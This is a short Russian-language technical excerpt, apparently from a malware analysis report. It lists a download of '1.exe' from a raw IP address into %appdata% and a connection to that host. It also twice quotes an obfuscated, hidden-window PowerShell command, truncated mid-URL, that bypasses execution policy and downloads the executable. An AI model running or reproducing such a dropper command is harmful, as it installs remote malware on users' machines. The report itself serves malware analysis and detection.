Техническая информация
- http://86.106.131.141/1.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWeRshell^.eX^e -exECutIOnp^oLICY BYpA^Ss -^NO^pROfil^e -w^I^ndOWstyLe ^HidD^e^N^ (^NEw-OBj^eC^T^ Sys^teM^.N^eT^.We^B^cL^i^EN^T).do^w^N^LOa^Dfil^e('http://86.106.131.141/1....
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /c "PoWeRshell^.eX^e -exECutIOnp^oLICY BYpA^Ss -^NO^pROfil^e -w^I^ndOWstyLe ^HidD^e^N^ (^NEw-OBj^eC^T^ Sys^teM^.N^eT^.We^B^cL^i^EN^T).do^w^N^LOa^Dfil^e('http://86.106.131.141/1....' (со скрытым окном)